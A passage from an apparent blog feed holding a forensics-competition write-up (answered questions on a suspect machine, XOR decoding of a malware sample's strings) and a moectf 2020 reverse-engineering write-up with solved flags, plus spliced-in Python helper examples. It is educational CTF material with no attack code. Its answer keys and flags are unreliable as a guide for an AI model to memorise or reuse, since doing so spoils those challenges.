class="number">0x57</span>,<span class="number">0x2E</span>,<span class="number">0x30</span>,<span class="number">0x28</span>,<span class="number">0x58</span>,<span class="number">0x5B</span>,<span class="number">0x1A</span>,<span class="number">0x57</span>,<span class="number">0x75</span>,<span class="number">0x3</span>,<span class="number">0x70</span>,<span class="number">0x70</span>,<span class="number">0x1C</span>,<span class="number">0x29</span>,<span class="number">0x33</span>,<span class="number">0x54</span>,<span class="number">0x0C</span>,<span class="number">0x73</span>,<span class="number">0x75</span>,<span class="number">0x75</span>,<span class="number">0x0D</span>,<span class="number">0x49</span>,<span class="number">0x5</span>,<span class="number">0x9</span>,<span class="number">0x75</span>,<span class="number">0x1E</span>,<span class="number">0x74</span>,<span class="number">0x72</span>,<span class="number">0x1C</span>,<span class="number">0x74</span>,<span class="number">0x71</span>,<span class="number">0x1</span>,<span class="number">0x18</span>,<span class="number">0x73</span>,<span class="number">0x7B</span>,<span class="number">0x73</span>,<span class="number">0x0D</span>]</span><br><span class="line">key = [<span class="number">0x42</span>,<span class="number">0x42</span>,<span class="number">0x32</span>,<span class="number">0x46</span>,<span class="number">0x41</span>,<span class="number">0x33</span>,<span class="number">0x36</span>,<span class="number">0x41</span>,<span class="number">0x41</span>,<span class="number">0x41</span>,<span class="number">0x39</span>,<span class="number">0x35</span>,<span class="number">0x34</span>,<span class="number">0x31</span>,<span class="number">0x46</span>,<span class="number">0x30</span>]  <span class="comment"># 16-byte repeating XOR key taken from the decryption routine</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> enc:</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="built_in">len</span>(i)):</span><br><span class="line">        print(<span class="built_in">chr</span>(<span class="built_in">ord</span>(i[j])^key[j%<span class="number">16</span>]),end=<span class="string">''</span>)</span><br><span class="line">    print()</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="built_in">len</span>(a)):</span><br><span class="line">    print(<span class="built_in">chr</span>(a[i]^key[i%<span class="number">16</span>]),end=<span class="string">''</span>)</span><br><span class="line">print()</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="built_in">len</span>(b)):</span><br><span class="line">    print(<span class="built_in">chr</span>(b[i]^key[i%<span class="number">16</span>]),end=<span class="string">''</span>)</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112150926723.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112150926723.png" srcset="" alt="image-20201112150926723"></p><p>And then... then I got stuck... As for where it copies itself, I went looking with the answer in hand. The main function calls a daemon_process:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112152112264.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112152112264.png" srcset="" alt="image-20201112152112264"></p><p><img 
src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112152342036.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112152342036.png" srcset="" alt="image-20201112152342036"></p><p>That should be it...</p><blockquote><p>President Frank says: "Getting stuck on one question forever is no fun!"</p></blockquote><p>So... let it go~</p><blockquote><ol start="92"><li><p>What is the file in the archive <code>test2-master.zip</code>? (<strong>C</strong>)</p><p> A. Malware B. Encryption program C. Key file D. Download software</p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111212304607.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111212304607.png" srcset="" alt="image-20201111212304607"></p><blockquote><ol start="93"><li><p>When was the application <code>TrueCrypt-7.2.exe</code> downloaded to this machine? (<strong>C</strong>)</p><p><code> A. 2019-07-06 00:04:38 B. 2019-07-06 00:06:38 C. 2019-07-06 00:08:38 D. 2019-07-06 00:10:38</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111212528321.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111212528321.png" srcset="" alt="image-20201111212528321"></p><blockquote><ol start="94"><li><p>From which domain was the file runit.txt downloaded? (<strong>D</strong>) </p><p> <code>A.https://pan.forensix.cn/lib/367d7f96-299f-4029-91a8-a31594b736cf/runit</code></p><p><code> B. 
https://pan.baidu.com/s/19uDE7H2RtEf7LLBgs5sDmg?errno=0&errmsg=AuthLoginSucess&&bduss=&ssnerror=0&traceid=</code></p><p> <code>C.https://pan.forensix.cn/seafhttp/files/dec88b97-b2bc-414f-93a3-dcbbc15d615/runit</code></p><p><code> D.https://pan.forensix.cn/seafhttp/files/8fdf1982-e323-4efe-ae28-2bba21b5162c/runit</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111212723050.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111212723050.png" srcset="" alt="image-20201111212723050"></p><blockquote><ol start="95"><li><p>Where is the <code>BitLocker</code> key located? (<strong>B</strong>)</p><p> <code>A. D:/DOWNLOAD B. C:/USER C. C:/ D. D:/</code></p></li><li><p>When was <code>BitLocker.rar</code> created? (<strong>B</strong>)</p><p> <code>A. 2019-07-13 17:51:47 B. 2019-07-13 17:52:19 C. 2019-07-13 17:53:24 D. 2019-07-13 16:31:06</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111212942950.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111212942950.png" srcset="" alt="image-20201111212942950"></p><blockquote><ol start="97"><li><p>When did the transfer of the file <code>we.tar.gz</code> complete? (<strong>C</strong>)</p><p><code> A. 2019-07-13 16:31:06 B. 2019-07-13 16:33:00 C. 2019-07-13 16:33:15 D. 
2019-07-13 16:33:30</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111213246657.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111213246657.png" srcset="" alt="image-20201111213246657"></p><blockquote><ol start="98"><li><p>When did the suspect log in to WeChat Web? (<strong>A</strong>)</p><p> <code>A. 2019-07-13 16:34:55 B. 2019-07-13 16:40:13 C. 2019-07-13 16:45:45 D. 2019-07-13 16:53:45</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111213636179.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111213636179.png" srcset="" alt="image-20201111213636179"></p><blockquote><ol start="99"><li><p>What file did the suspect download at <code>2019-07-13 17:22:23</code>? (<strong>B</strong>)</p><p> A. Website directory archive B. Database backup file C. Website log file D. Database log file</p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111215055052.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111215055052.png" srcset="" alt="image-20201111215055052"></p><blockquote><ol start="100"><li><p>What is the purpose of the file <code>pagefile.sys.vhd</code> in the root directory of drive C? (<strong>D</strong>)</p><p> A. <code>pagefile</code> page swap file B. Virtual machine boot file C. System configuration file D. Virtual disk</p></li></ol></blockquote><p>...Earlier we double-clicked this file, unlocked <code>Bitlocker</code>, and drive <code>D</code> was mounted, so it should be a virtual disk.</p>]]></content>
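The repeating-key XOR used for the runit sample's string table, as an added example that is not part of the original write-up: KEY and ENC are the values the decoding script above lifted from the binary, the function names are this example's own, and the decoder cuts at the first NUL because each string is stored with its C terminator encoded as well.

```python
# Added example (not the write-up's own code): repeating-key XOR decoder for
# the string table of the "runit" sample. KEY and ENC are the values the
# write-up pulled out of the binary; the function names are this example's own.

KEY = b"BB2FA36AAA9541F0"   # the 16 key bytes 0x42,0x42,0x32,0x46,... as ASCII

# Encoded strings exactly as listed in the write-up's script. latin-1 keeps a
# one-byte-per-character mapping; "\x26" is the ampersand character.
ENC = [
    "m7A4nQ_/nA",
    "m [(n3",
    "m6_6n3",
    "m4S4nAC/n\x26ZV",
    "m.[$n__#4%\\C",
    "m.[$n3",
    "m4S4nAC/nA",
]


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR every byte of data with the key byte at the same position mod len(key)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_string(enc: str, key: bytes = KEY) -> str:
    """Decode one blob. The sample stores C strings, so the encoded NUL
    terminator (key byte XOR 0) is part of the blob: cut at the first NUL."""
    plain = xor_repeating(enc.encode("latin-1"), key)
    return plain.split(b"\x00", 1)[0].decode("latin-1")


def decode_runit_strings(blobs=ENC, key=KEY) -> list:
    """Decode the whole table in order, dropping duplicate entries."""
    seen = []
    for blob in blobs:
        s = decode_string(blob, key)
        if s not in seen:
            seen.append(s)
    return seen


if __name__ == "__main__":
    for path in decode_runit_strings():
        print(path)
```

The decoded table is the set of filesystem locations the sample works with, which is what question 90 above asks about.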
<categories>
<category> Digital Forensics Study </category>
</categories>
<tags>
<tag> wp </tag>
<tag> digital forensics </tag>
</tags>
</entry>
<entry>
<title>2020moectf Reverse</title>
<link href="2020/10/31/2020moectf-Reverse/"/>
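The eval(function(p,a,c,k,e,d){...}) packer met in the Thank you Javascript section of this post can be unpacked offline. This added Python example (not the write-up's or the challenge author's code) ports the packer's token encoder and whole-word substitution and runs it on the post's own three packer arguments; unpack and flag_from_comparison are names chosen here.

```python
# Added example (not from the write-up): offline unpacker for the
# eval(function(p,a,c,k,e,d){...}) packer used by the Thank you Javascript
# challenge. PAYLOAD, RADIX and WORDS are the packer arguments from the post.
import re

PAYLOAD = ("l 1=m('k-4-2');i j 6(){1.2('q r p --n o b');1.2(5 1.4());"
           "1.2(`a ${5 1.d('9 h e?')}!`);f 3=g;F(!3){1.2('D E 7 B 8:');"
           "3=5 1.4()==='G{H'+'c'+'v'+'w'+'0'+'u-'+'s'+'t'+'z'+'A'+'!}'}"
           "1.2('y! x C 7 8!')}6();")
RADIX = 44            # the packer's "a": token values are written in base 44
WORDS = ("|io|write|saidHi|read|await|main|the|flag|Who|Hello|Reverier||ask"
         "|you|let|false|are|async|function|console|const|require|written|by"
         "|ThankYouJavaScript|MoeCTF|2020|Jav|aS||k_|Y|You|Congratulations|cr"
         "|ipt|true|find|Please|input|while|moectf|Fx").split("|")

DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"


def encode_token(value: int, radix: int) -> str:
    """Port of the packer's e(): base-radix, digits 0-9 and a-z for 0..35,
    then String.fromCharCode(d + 29), i.e. 'A', 'B', ..., for digits above 35."""
    prefix = encode_token(value // radix, radix) if value >= radix else ""
    d = value % radix
    return prefix + (chr(d + 29) if d > 35 else DIGITS[d])


def unpack(payload: str, radix: int, words: list) -> str:
    """Rebuild the token-to-word dictionary and substitute every whole word in
    one pass, which is what the packer's d[e(c)] = k[c] || e(c) branch does.
    Empty dictionary entries leave the token untouched."""
    table = {}
    for c, word in enumerate(words):
        token = encode_token(c, radix)
        table[token] = word if word else token
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), payload)


def flag_from_comparison(js: str) -> str:
    """Join the single-quoted pieces of the 'a'+'b'+... expression that the
    unpacked code compares the input against (the text right after ===)."""
    m = re.search(r"===((?:'[^']*'\+?)+)", js)
    if m is None:
        return ""
    return "".join(re.findall(r"'([^']*)'", m.group(1)))


if __name__ == "__main__":
    source = unpack(PAYLOAD, RADIX, WORDS)
    print(source)
    print(flag_from_comparison(source))
```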
<url>2020/10/31/2020moectf-Reverse/</url>
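The XOR properties quoted in the Simple Re section of this post explain why the sixteen per-constant loops of its decryption script can be folded into a single pass. This added Python example (not the write-up's code) checks that on the post's own comparison string; fold_key, decrypt_multipass and decrypt_singlepass are names chosen here.

```python
# Added example (not the write-up's code): the Simple Re check applies sixteen
# constant XOR passes to the input. Because XOR is commutative and associative
# and x ^ x == 0, all of them fold into one pass with a single byte.
from functools import reduce

# Encrypted comparison target and the per-pass constants lifted from the
# decompiled binary, in the order the write-up's C++ script applies them.
TARGET = "rpz|kydKw^qTl@Y/m2f/J-@o^k.,qkb"
PASSES = [0x17, 0x39, 0x4B, 0x4A, 0x49, 0x26, 0x15, 0x61,
          0x56, 0x1B, 0x21, 0x40, 0x57, 0x2E, 0x49, 0x37]


def decrypt_multipass(target: str, passes: list) -> str:
    """Mirror the C++ script: one full loop over the buffer per constant."""
    buf = bytearray(target.encode("latin-1"))
    for k in passes:
        for i in range(len(buf)):
            buf[i] ^= k
    return buf.decode("latin-1")


def fold_key(passes: list) -> int:
    """XOR all pass constants together; this single byte undoes every pass,
    and a constant that appears twice (0x49 here) cancels itself out."""
    return reduce(lambda x, y: x ^ y, passes, 0)


def decrypt_singlepass(target: str, passes: list) -> str:
    """Same result as decrypt_multipass with one XOR per character."""
    k = fold_key(passes)
    return "".join(chr(ord(ch) ^ k) for ch in target)


if __name__ == "__main__":
    print(hex(fold_key(PASSES)))             # 0x1f
    print(decrypt_singlepass(TARGET, PASSES))
```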
<content type="html"><![CDATA[<p><code>Reverse</code> was my second-highest scoring category. For that many points I have to thank big brother <code>void</code>, and then thank the challenge author <code>RX</code> for making a <code>py</code> deal with me... In the end there were still three challenges I didn't solve, sigh<code>~</code> still too much of a noob; I'll keep learning from brother <code>void</code> and master <code>RX</code><code>~</code></p><p><img src="/images/2020moectf-Reverse/image-20201031022658022.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031022658022.png" srcset="" alt="image-20201031022658022"></p><a id="more"></a><h2 id="我做出来的"><a href="#我做出来的" class="headerlink" title="What I solved"></a>What I solved</h2><h3 id="逆向工程入门指北"><a href="#逆向工程入门指北" class="headerlink" title="Reverse Engineering Beginner's Guide"></a>Reverse Engineering Beginner's Guide</h3><p>Thanks to the great <code>RX</code> for the study material, I'll gladly take it~~</p><h3 id="Welcome-To-Re"><a href="#Welcome-To-Re" class="headerlink" title="Welcome To Re"></a>Welcome To Re</h3><p>Drag it into <code>IDA64</code>, find the <code>main</code> function, press <code>F5</code> to decompile:</p><p><img src="/images/2020moectf-Reverse/image-20201015195648276.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015195648276.png" srcset="" alt="image-20201015195648276"></p><blockquote><p>moectf{W3lc0me-T0_th3-W0rld_Of_R3v3rsE!}</p></blockquote><h3 id="Thank-you-Javascript"><a href="#Thank-you-Javascript" class="headerlink" title="Thank you Javascript"></a>Thank you Javascript</h3><p><img src="/images/2020moectf-Reverse/image-20201015200045087.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015200045087.png" srcset="" alt="image-20201015200045087"></p><p>Generally speaking, running it first puts the mind at ease...</p><p><img src="/images/2020moectf-Reverse/image-20201015201417408.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015201417408.png" srcset="" alt="image-20201015201417408"></p><p>But the run output isn't much use.</p><p><img src="/images/2020moectf-Reverse/image-20201015201444710.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015201444710.png" srcset="" alt="image-20201015201444710"></p><p>Obfuscation??? Let's look it up; search for the keywords "<code>JS</code> obfuscation":</p><p><img src="/images/2020moectf-Reverse/image-20210228232046.png" 
class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20210228232046.png" srcset="" alt="image-20201015201547809"></p><p>What??? Your search didn't find it?</p><p>Don't ask; if you ask, it's your search engine that's trash!</p><p>Obfuscated:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">eval</span>(<span class="function"><span class="keyword">function</span>(<span class="params">p, a, c, k, e, d</span>) </span>{</span><br><span class="line"> e = <span class="function"><span class="keyword">function</span>(<span class="params">c</span>) </span>{</span><br><span class="line"> <span class="keyword">return</span> (c < a ? <span class="string">""</span>: e(<span class="built_in">parseInt</span>(c / a))) + ((c = c % a) > <span class="number">35</span> ? 
<span class="built_in">String</span>.fromCharCode(c + <span class="number">29</span>) : c.toString(<span class="number">36</span>))</span><br><span class="line"> };</span><br><span class="line"> <span class="keyword">if</span> (!<span class="string">''</span>.replace(<span class="regexp">/^/</span>, <span class="built_in">String</span>)) {</span><br><span class="line"> <span class="keyword">while</span> (c--) d[e(c)] = k[c] || e(c);</span><br><span class="line"> k = [<span class="function"><span class="keyword">function</span>(<span class="params">e</span>) </span>{</span><br><span class="line"> <span class="keyword">return</span> d[e]</span><br><span class="line"> }];</span><br><span class="line"> e = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'\\w+'</span></span><br><span class="line"> };</span><br><span class="line"> c = <span class="number">1</span>;</span><br><span class="line"> };</span><br><span class="line"> <span class="keyword">while</span> (c--) <span class="keyword">if</span> (k[c]) p = p.replace(<span class="keyword">new</span> <span class="built_in">RegExp</span>(<span class="string">'\\b'</span> + e(c) + <span class="string">'\\b'</span>, <span class="string">'g'</span>), k[c]);</span><br><span class="line"> <span class="keyword">return</span> p;</span><br><span class="line">} (<span class="string">'l 1=m(\'k-4-2\');i j 6(){1.2(\'q r p --n o b\');1.2(5 1.4());1.2(`a ${5 1.d(\'9 h e?\')}!`);f 3=g;F(!3){1.2(\'D E 7 B 8:\');3=5 1.4()===\'G{H\'+\'c\'+\'v\'+\'w\'+\'0\'+\'u-\'+\'s\'+\'t\'+\'z\'+\'A\'+\'!}\'}1.2(\'y! 
x C 7 8!\')}6();'</span>, <span class="number">44</span>, <span class="number">44</span>, <span class="string">'|io|write|saidHi|read|await|main|the|flag|Who|Hello|Reverier||ask|you|let|false|are|async|function|console|const|require|written|by|ThankYouJavaScript|MoeCTF|2020|Jav|aS||k_|Y|You|Congratulations|cr|ipt|true|find|Please|input|while|moectf|Fx'</span>.split(<span class="string">'|'</span>), <span class="number">0</span>, {}))</span><br></pre></td></tr></table></figure><p>After deobfuscation:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> io=<span class="built_in">require</span>(<span class="string">'console-read-write'</span>);</span><br><span class="line"><span class="keyword">async</span> <span class="function"><span class="keyword">function</span> <span class="title">main</span>(<span class="params"></span>)</span>{</span><br><span class="line"> io.write(<span class="string">'MoeCTF 2020 ThankYouJavaScript --written by Reverier'</span>);</span><br><span class="line"> io.write(<span class="keyword">await</span> io.read());</span><br><span class="line"> io.write(<span class="string">`Hello <span class="subst">${<span class="keyword">await</span> io.ask(<span class="string">'Who are you?'</span>)}</span>!`</span>);</span><br><span class="line"> <span class="keyword">let</span> saidHi=<span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">while</span>(!saidHi)</span><br><span class="line"> 
{</span><br><span class="line"> io.write(<span class="string">'Please input the true flag:'</span>);</span><br><span class="line"> saidHi=<span class="keyword">await</span> </span><br><span class="line"> io.read()===<span class="string">'moectf{Fx'</span>+<span class="string">'c'</span>+<span class="string">'k_'</span>+<span class="string">'Y'</span>+<span class="string">'0'</span>+<span class="string">'u-'</span>+<span class="string">'Jav'</span>+<span class="string">'aS'</span>+<span class="string">'cr'</span>+<span class="string">'ipt'</span>+<span class="string">'!}'</span></span><br><span class="line"> }</span><br><span class="line"> io.write(<span class="string">'Congratulations! You find the flag!'</span>)</span><br><span class="line">}main();</span><br></pre></td></tr></table></figure><blockquote><p>moectf{Fxck_Y0u-JavaScript!}</p></blockquote><h3 id="Simple-Re"><a href="#Simple-Re" class="headerlink" title="Simple Re"></a>Simple Re</h3><p>Run it first:<img src="/images/2020moectf-Reverse/image-20201015202120586.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015202120586.png" srcset="" alt="image-20201015202120586"></p><p>Hmm??? It won't just hand me the <code>flag</code>. Hand it over to my girlfriend <code>IDA</code> and let her deal with it!!!</p><p><img src="/images/2020moectf-Reverse/image-20201015202226688.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015202226688.png" srcset="" alt="image-20201015202226688"></p><p><img src="/images/2020moectf-Reverse/image-20201015202255951.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015202255951.png" srcset="" alt="image-20201015202255951"></p><p>Found the key comparison! My girlfriend is the best!!!</p><p>The idea is fairly clear: whatever we type in goes through a pile of XOR operations and is then compared with the encrypted <code>flag</code>, which matches the hint: XOR, XOR!</p><p>So we pull out the encrypted <code>flag</code> and write a program that reverses the algorithm, and we're done. But how do you invert XOR???</p><blockquote><p>Properties</p><p>1. Commutative</p><p>2. Associative, i.e. (a ^ b) ^ c == a ^ (b ^ c)</p><p>3. For any number x, x ^ x = 0 and x ^ 0 = x</p><p><strong>4. Self-inverse: A XOR B XOR B = A xor 0 = 
A</strong></p></blockquote><p>This uses the commutativity and self-inverse property of XOR: applying each constant once more cancels it out, so the encrypted string XORed with the same constants in any order gives back the plaintext.</p><p>Straight to the decryption script:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span 
class="built_in">string</span> aim=<span class="string">"rpz|kydKw^qTl@Y/m2f/J-@o^k.,qkb"</span>;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i <= <span class="number">30</span>; ++i )</span><br><span class="line"> aim[i] ^= <span class="number">0x17</span>;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> j = <span class="number">0</span>; j <= <span class="number">30</span>; ++j )</span><br><span class="line"> aim[j] ^= <span class="number">0x39</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> k = <span class="number">0</span>; k <= <span class="number">30</span>; ++k )</span><br><span class="line"> aim[k] ^= <span class="number">0x4B</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> l = <span class="number">0</span>; l <= <span class="number">30</span>; ++l )</span><br><span class="line"> aim[l] ^= <span class="number">0x4A</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> m = <span class="number">0</span>; m <= <span class="number">30</span>; ++m )</span><br><span class="line"> aim[m] ^= <span class="number">0x49</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> n = <span class="number">0</span>; n <= <span class="number">30</span>; ++n )</span><br><span class="line"> aim[n] ^= <span class="number">0x26</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> ii = <span class="number">0</span>; ii <= <span class="number">30</span>; ++ii )</span><br><span class="line"> aim[ii] ^= <span class="number">0x15</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> jj = <span class="number">0</span>; jj <= <span 
class="number">30</span>; ++jj )</span><br><span class="line"> aim[jj] ^= <span class="number">0x61</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> kk = <span class="number">0</span>; kk <= <span class="number">30</span>; ++kk )</span><br><span class="line"> aim[kk] ^= <span class="number">0x56</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> ll = <span class="number">0</span>; ll <= <span class="number">30</span>; ++ll )</span><br><span class="line"> aim[ll] ^= <span class="number">0x1B</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> mm = <span class="number">0</span>; mm <= <span class="number">30</span>; ++mm )</span><br><span class="line"> aim[mm] ^= <span class="number">0x21</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> nn = <span class="number">0</span>; nn <= <span class="number">30</span>; ++nn )</span><br><span class="line"> aim[nn] ^= <span class="number">0x40</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i1 = <span class="number">0</span>; i1 <= <span class="number">30</span>; ++i1 )</span><br><span class="line"> aim[i1] ^= <span class="number">0x57</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i2 = <span class="number">0</span>; i2 <= <span class="number">30</span>; ++i2 )</span><br><span class="line"> aim[i2] ^= <span class="number">0x2E</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i3 = <span class="number">0</span>; i3 <= <span class="number">30</span>; ++i3 )</span><br><span class="line"> aim[i3] ^= <span class="number">0x49</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i4 = <span 
